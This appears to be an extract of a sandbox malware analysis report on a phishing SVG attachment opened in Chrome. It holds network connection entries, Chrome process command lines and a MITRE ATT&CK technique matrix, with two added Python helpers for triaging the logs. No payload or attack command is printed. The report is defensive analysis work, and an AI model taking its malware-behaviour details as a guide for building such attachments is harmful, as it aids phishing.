    49735 -> 443, 49790 -> 443, 443 -> 49687, 49731 -> 443, 443 -> 49686, 443 -> 49685, 443 -> 49684, 49697 -> 443,
    49787 -> 443, 49748 -> 443, 49729 -> 443, 49760 -> 443, 443 -> 49719, 443 -> 49718, 49751 -> 443, 443 -> 49716,
    49782 -> 443, 443 -> 49798, 443 -> 49797, 443 -> 49675, 443 -> 49791, 443 -> 49790, 49740 -> 443, 59664 -> 443,
    49771 -> 443, 443 -> 49789, 443 -> 49788, 443 -> 49787, 49779 -> 443, 443 -> 49785, 443 -> 49784, 49676 -> 443,
    443 -> 49782, 443 -> 49781, 443 -> 49780, 49727 -> 443, 49785 -> 443, 59667 -> 443, 49791 -> 443, 49736 -> 443,
    49759 -> 443, 443 -> 49779, 443 -> 49771, 49788 -> 443, 49780 -> 443, 49685 -> 443, 49802 -> 443, 443 -> 49804,
    49718 -> 443, 443 -> 49802
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 59665 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59664
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 59660 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59663
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59666
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59665
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59660
        Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownHTTPS traffic detected: 150.171.27.254:443 -> 192.168.2.5:49729 version: TLS 1.2
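The port-pair entries above record one connection per direction, so the list looks larger than the activity it describes. The Python below is an added triage helper, not part of the Joe Sandbox report, that folds the two directional entries of a connection onto a single row keyed by the client's ephemeral port, attaches the peer address and TLS version from any "HTTPS traffic detected" line, and reports which connections were logged in only one direction. The sample lines inside it are a constructed subset in this report's wording; the parser relies only on the "HTTP traffic on port A -> B" and "HTTPS traffic detected" phrasing, so it runs unchanged over the full list.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, Optional, Tuple

# Windows hands out dynamic (ephemeral) client ports from 49152 to 65535.
EPHEMERAL = range(49152, 65536)

PORT_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_RE = re.compile(
    r"HTTPS traffic detected: (\d+\.\d+\.\d+\.\d+):(\d+) -> "
    r"(\d+\.\d+\.\d+\.\d+):(\d+) version: (TLS [\d.]+)"
)

# Constructed sample in this report's wording (a subset, not the full list).
SAMPLE_LINES = """\
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown | Network traffic detected: HTTP traffic on port 59664 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | HTTPS traffic detected: 150.171.27.254:443 -> 192.168.2.5:49729 version: TLS 1.2
"""


@dataclass
class Flow:
    client_port: int
    server_port: int
    outbound: bool = False            # a client -> server entry was seen
    inbound: bool = False             # a server -> client entry was seen
    peer: Optional[str] = None        # server IP, when an HTTPS line named it
    tls_version: Optional[str] = None


def parse_flows(lines: Iterable[str]) -> Dict[Tuple[int, int], Flow]:
    """Fold directional report entries onto (client_port, server_port) rows."""
    flows: Dict[Tuple[int, int], Flow] = {}
    for line in lines:
        m = PORT_RE.search(line)
        if m:
            src, dst = int(m.group(1)), int(m.group(2))
            # Decide which side is the client by which port is ephemeral.
            if src in EPHEMERAL and dst not in EPHEMERAL:
                key, outbound = (src, dst), True
            elif dst in EPHEMERAL and src not in EPHEMERAL:
                key, outbound = (dst, src), False
            else:
                continue  # both or neither look ephemeral: do not guess
            flow = flows.setdefault(key, Flow(*key))
            if outbound:
                flow.outbound = True
            else:
                flow.inbound = True
            continue
        m = TLS_RE.search(line)
        if m:
            # The HTTPS line names the server side first; use it only to
            # attach peer and version, not to infer direction.
            peer_ip, peer_port, _client_ip, client_port, version = m.groups()
            key = (int(client_port), int(peer_port))
            flow = flows.setdefault(key, Flow(*key))
            flow.peer, flow.tls_version = peer_ip, version
    return flows


def summarize(flows: Dict[Tuple[int, int], Flow]) -> Dict[str, object]:
    vals = list(flows.values())
    return {
        "connections": len(vals),
        "both_directions": sum(1 for f in vals if f.outbound and f.inbound),
        "one_direction_only": sum(1 for f in vals if f.outbound != f.inbound),
        "server_ports": sorted({f.server_port for f in vals}),
        "tls_peers": sorted(
            f"{f.peer}:{f.server_port} {f.tls_version}" for f in vals if f.peer
        ),
    }


if __name__ == "__main__":
    print(summarize(parse_flows(SAMPLE_LINES.splitlines())))
```

Over the full list this collapses the entries to one row per client port and makes the connections that were logged in only one direction stand out; those are the ones worth checking against the PCAP, since a single directional entry can be a connection the sandbox saw only half of.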
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir8572_902717126
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir8572_902717126
Source: classification engine | Classification label: mal64.phis.troj.winSVG@41/34@117/17
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Local\Packages\cr.sb.odm3E4D1A088C1F6D498C84F3C86DE73CE49F82A104
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT48234.svg"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2252 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5196 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5128 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown (2 consecutive entries; command line not resolved by the sandbox)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2252 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown (10 consecutive entries; command line not resolved by the sandbox)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5196 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown (22 consecutive entries; command line not resolved by the sandbox)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=1976,i,12216711125976457745,3421467908659589367,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5128 /prefetch:8
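The process-creation entries above are Chrome's own utility children, and the thing worth pulling out of them is which ones run with --service-sandbox-type=none and how many children the sandbox could not attribute a command line to. The Python below is an added example, not code from the report or from Joe Sandbox: it parses "Process created" entries in this report's format, extracts the --type, --utility-sub-type and --service-sandbox-type switches, flags unsandboxed utility processes, and lists any child whose image is not chrome.exe. The sample entries are a constructed, abbreviated subset of the ones above (the field-trial and variations-seed switches are dropped for brevity).

```python
import re
from typing import Dict, List

# Chromium switches look like --name or --name=value; in these report
# lines a value never contains whitespace.
FLAG_RE = re.compile(r"--([A-Za-z0-9_-]+)(?:=(\S+))?")

# Constructed sample: abbreviated entries in this report's format.
SAMPLE_PROCESS_LINES = """\
Source: unknown | Process created: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --start-maximized "C:\\Users\\user\\Desktop\\ATT48234.svg"
Source: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe | Process created: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --mojo-platform-channel-handle=2252 /prefetch:3
Source: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe | Process created: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --mojo-platform-channel-handle=5196 /prefetch:8
Source: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe | Process created: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --mojo-platform-channel-handle=5128 /prefetch:8
Source: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe | Process created: unknown unknown
"""


def parse_process_line(line: str) -> Dict[str, object]:
    """Extract the fields a triage pass cares about from one entry."""
    _, sep, cmd = line.partition("Process created:")
    cmd = cmd.strip()
    if not sep or cmd in ("", "unknown unknown"):
        # The sandbox could not resolve the image or command line.
        return {"resolved": False, "image": None, "process_type": None,
                "utility_sub_type": None, "sandbox_type": None,
                "unsandboxed": False}
    # The image path precedes the quoted command line.
    image = cmd.split('"', 1)[0].strip()
    flags: Dict[str, object] = {}
    for name, value in FLAG_RE.findall(cmd):
        flags[name] = value if value else True  # bare switch -> True
    sandbox = flags.get("service-sandbox-type")
    return {
        "resolved": True,
        "image": image,
        # The main browser process carries no --type switch.
        "process_type": flags.get("type", "browser"),
        "utility_sub_type": flags.get("utility-sub-type"),
        "sandbox_type": sandbox,
        "unsandboxed": sandbox == "none",
    }


def triage(lines: List[str]) -> Dict[str, object]:
    rows = [parse_process_line(line) for line in lines if "Process created:" in line]
    return {
        "total": len(rows),
        "unresolved": sum(1 for r in rows if not r["resolved"]),
        "images": sorted({r["image"] for r in rows if r["image"]}),
        "unsandboxed_utilities": sorted(
            str(r["utility_sub_type"]) for r in rows if r["unsandboxed"]
        ),
        "non_chrome_children": sorted(
            str(r["image"]) for r in rows
            if r["image"] and not str(r["image"]).lower().endswith("\\chrome.exe")
        ),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PROCESS_LINES.splitlines()).items():
        print(f"{key}: {value}")
```

In this report the entries with --service-sandbox-type=none are the network service and the print backend host, both launched by chrome.exe with Chrome's own switches, so they are context rather than a finding. The check pays off when a child whose image is not chrome.exe, or a renderer that asks for no sandbox, turns up in a report; the count of unresolved "unknown unknown" entries tells you how much of the process tree the sandbox did not capture.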
MITRE ATT&CK Matrix

One line per tactic. A number in parentheses is the count of signatures in this report that matched that technique; cells without a count are the matrix's default placeholder techniques, with no matching signature in this analysis.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
Privilege Escalation: Process Injection (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
Defense Evasion: Masquerading (11); Process Injection (1); File Deletion (1); Binary Padding
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: System Service Discovery; Application Window Discovery; Query Registry; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (3); Application Layer Protocol (4); Ingress Tool Transfer (1)
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction
Behavior Graph (the graph itself is not reproduced in this text extract)

Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

Screenshots: the thumbnails are not reproduced in this text extract.